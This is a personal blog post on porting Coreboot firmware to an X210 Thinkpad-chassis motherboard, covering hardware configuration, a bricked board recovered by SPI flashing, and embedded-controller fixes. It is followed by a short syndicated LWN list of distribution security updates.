The X210 is a strange machine. A set of Chinese enthusiasts developed a series of motherboards that slot into old Thinkpad chassis, providing significantly more up to date hardware. The X210 has a Kabylake CPU, supports up to 32GB of RAM, has an NVMe-capable M.2 slot and has eDP support – and it fits into an X200 or X201 chassis, which means it also comes with a classic Thinkpad keyboard . We ordered some from a Facebook page (a process that involved wiring a large chunk of money to a Chinese bank which wasn’t at all stressful), and a couple of weeks later they arrived. Once I’d put mine together I had a quad-core i7-8550U with 16GB of RAM, a 512GB NVMe drive and a 1920×1200 display. I’d transplanted over the drive from my XPS13, so I was running stock Fedora for most of this development process.

The other fun thing about it is that none of the firmware flashing protection is enabled, including Intel Boot Guard. This means running a custom firmware image is possible, and what would a ridiculous custom Thinkpad be without ridiculous custom firmware? A shadow of its potential, that’s what. So, I read the Coreboot[1] motherboard porting guide and set to.

My life was made a great deal easier by the existence of a port for the Purism Librem 13v2. This is a Skylake system, and Skylake and Kabylake are very similar platforms. So, the first job was to just copy that into a new directory and start from there. The first step was to update the Inteltool utility so it understood the chipset – this commit shows what was necessary there. It’s mostly just adding new PCI IDs, but it also needed some adjustment to account for the GPIO allocation being different on mobile parts when compared to desktop ones. One thing that bit me – Inteltool relies on being able to mmap() arbitrary bits of physical address space, and the kernel doesn’t allow that if CONFIG_STRICT_DEVMEM is enabled. I had to disable that first.

The GPIO pins got dropped into gpio.h. I ended up just pushing the raw values into there rather than parsing them back into more semantically meaningful definitions, partly because I don’t understand what these things do that well and largely because I’m lazy. Once that was done, on to the next step.

High Definition Audio devices (or HDA) have a standard interface, but the codecs attached to the HDA device vary – both in terms of their own configuration, and in terms of dealing with how the board designer may have laid things out. Thankfully the existing configuration could be copied from /sys/class/sound/card0/hwC0D0/init_pin_configs[2] and then hda_verb.h could be updated.

One more piece of hardware-specific configuration is the Video BIOS Table, or VBT. This contains information used by the graphics drivers (firmware or OS-level) to configure the display correctly, and again is somewhat system-specific. This can be grabbed from /sys/kernel/debug/dri/0/i915_vbt.

A lot of the remaining platform-specific configuration has been split out into board-specific config files. and this also needed updating. Most stuff was the same, but I confirmed the GPE and genx_dec register values by using Inteltool to dump them from the vendor system and copy them over. lspci -t gave me the bus topology and told me which PCIe root ports were in use, and lsusb -t gave me port numbers for USB. That let me update the root port and USB tables.

The final code update required was to tell the OS how to communicate with the embedded controller. Various ACPI functions are actually handled by this autonomous device, but it’s still necessary for the OS to know how to obtain information from it. This involves writing some ACPI code, but that’s largely a matter of cutting and pasting from the vendor firmware – the EC layout depends on the EC firmware rather than the system firmware, and we weren’t planning on changing the EC firmware in any way. Using ifdtool told me that the vendor firmware image wasn’t using the EC region of the flash, so my assumption was that the EC had its own firmware stored somewhere else. I was ready to flash.

The first attempt involved isis’ machine, using their Beaglebone Black as a flashing device – the lack of protection in the firmware meant we ought to be able to get away with using flashrom directly on the host SPI controller, but using an external flasher meant we stood a better chance of being able to recover if something went wrong. We flashed, plugged in the power and… nothing. Literally. The power LED didn’t turn on. The machine was very, very dead.

Things like managing battery charging and status indicators are up to the EC, and the complete absence of anything going on here meant that the EC wasn’t running. The most likely reason for that was that the system flash did contain the EC’s firmware even though the descriptor said it didn’t, and now the system was very unhappy. Worse, the flash wouldn’t speak to us any more – the power supply from the Beaglebone to the flash chip was sufficient to power up the EC, and the EC was then holding onto the SPI bus desperately trying to read its firmware. Bother. This was made rather more embarrassing because isis had explicitly raised concern about flashing an image that didn’t contain any EC firmware, and now I’d killed their laptop.

After some digging I was able to find EC firmware for a related 51NB system, and looking at that gave me a bunch of strings that seemed reasonably identifiable. Looking at the original vendor ROM showed very similar code located at offset 0x00200000 into the image, so I added a small tool to inject the EC firmware (basing it on an existing tool that does something similar for the EC in some HP laptops). I now had an image that I was reasonably confident would get further, but we couldn’t flash it. Next step seemed like it was going to involve desoldering the flash from the board, which is a colossal pain. Time to sleep on the problem.

The next morning we were able to borrow a Dediprog SPI flasher. These are much faster than doing SPI over GPIO lines, and also support running the flash at different voltage. At 3.5V the behaviour was the same as we’d seen the previous night – nothing. According to the datasheet, the flash required at least 2.7V to run, but flashrom listed 1.8V as the next lower voltage so we tried. And, amazingly, it worked – not reliably, but sufficiently. Our hypothesis is that the chip is marginally able to run at that voltage, but that the EC isn’t – we were no longer powering the EC up, so could communicated with the flash. After a couple of attempts we were able to write enough that we had EC firmware on there, at which point we could shift back to flashing at 3.5V because the EC was leaving the flash alone.

So, we flashed again. And, amazingly, we ended up staring at a UEFI shell prompt[3]. USB wasn’t working, and nor was the onboard keyboard, but we had graphics and were executing actual firmware code. I was able to get USB working fairly quickly – it turns out that Linux numbers USB ports from 1 and the FSP numbers them from 0, and fixing that up gave us working USB. We were able to boot Linux! Except there were a whole bunch of errors complaining about EC timeouts, and also we only had half the RAM we should.

After some discussion on the Coreboot IRC channel, we figured out the RAM issue – the Librem13 only has one DIMM slot. The FSP expects to be given a set of i2c addresses to probe, one for each DIMM socket. It is then able to read back the DIMM configuration and configure the memory controller appropriately. Running i2cdetect against the system SMBus gave us a range of devices, including one at 0x50 and one at 0x52. The detected DIMM was at 0x50, which made 0x52 seem like a reasonable bet – and grepping the tree showed that several other systems used 0x52 as the address for their second socket. Adding that to the list of addresses and passing it to the FSP gave us all our RAM.

So, now we just had to deal with the EC. One thing we noticed was that if we flashed the vendor firmware, ran it, flashed Coreboot and then rebooted without cutting the power, the EC worked. This strongly suggested that there was some setup code happening in the vendor firmware that configured the EC appropriately, and if we duplicated that it would probably work. Unfortunately, figuring out what that code was was difficult. I ended up dumping the PCI device configuration for the vendor firmware and for Coreboot in case that would give us any clues, but the only thing that seemed relevant at all was that the LPC controller was configured to pass io ports 0x4e and 0x4f to the LPC bus with the vendor firmware, but not with Coreboot. Unfortunately the EC was supposed to be listening on 0x62 and 0x66, so this wasn’t the problem.

I ended up solving this by using UEFITool to extract all the code from the vendor firmware, and then disassembled every object and grepped them for port io. x86 systems have two separate io buses – memory and port IO. Port IO is well suited to simple devices that don’t need a lot of bandwidth, and the EC is definitely one of these – there’s no way to talk to it other than using port IO, so any configuration was almost certainly happening that way. I found a whole bunch of stuff that touched the EC, but was clearly depending on it already having been enabled. I found a wide range of cases where port IO was being used for early PCI configuration. And, finally, I found some code that reconfigured the LPC bridge to route 0x4e and 0x4f to the LPC bus (explaining the configuration change I’d seen earlier), and then wrote a bunch of values to those addresses. I mimicked those, and suddenly the EC started responding.

It turns out that the writes that made this work weren’t terribly magic. PCs used to have a SuperIO chip that provided most of the legacy port functionality, including the floppy drive controller and parallel and serial ports. Individual components (called logical devices, or LDNs) could be enabled and disabled using a sequence of writes that was fairly consistent between vendors. Someone on the Coreboot IRC channel recognised that the writes that enabled the EC were simply using that protocol to enable a series of LDNs, which apparently correspond to things like “Working EC” and “Working keyboard”. And with that, we were done.

Coreboot doesn’t currently have ACPI support for the latest Intel graphics chipsets, so right now my image doesn’t have working backlight control. But other than that, everything seems to work (although there’s probably a bunch of power management optimisation to do). I started this process knowing almost nothing about Coreboot, but thanks to the help of people on IRC I was able to get things working in about two days of work[4] and now have firmware that’s about as custom as my laptop.

[1] Why not Libreboot? Because modern Intel SoCs haven’t had their memory initialisation code reverse engineered, so the only way to boot them is to use the proprietary Intel Firmware Support Package.
[2] Card 0, device 0
[3] After a few false starts – it turns out that the initial memory training can take a surprisingly long time, and we kept giving up before that had happened
[4] Spread over 5 or so days of real time

comment count unavailable comments

Security updates for Monday

Post Syndicated from ris original https://lwn.net/Articles/756489/rss

Security updates have been issued by CentOS (procps, xmlrpc, and xmlrpc3), Debian (batik, prosody, redmine, wireshark, and zookeeper), Fedora (jasper, kernel, poppler, and xmlrpc), Mageia (git and wireshark), Red Hat (rh-java-common-xmlrpc), Slackware (git), SUSE (bzr, dpdk-thunderxdpdk, and ocaml), and Ubuntu (exempi).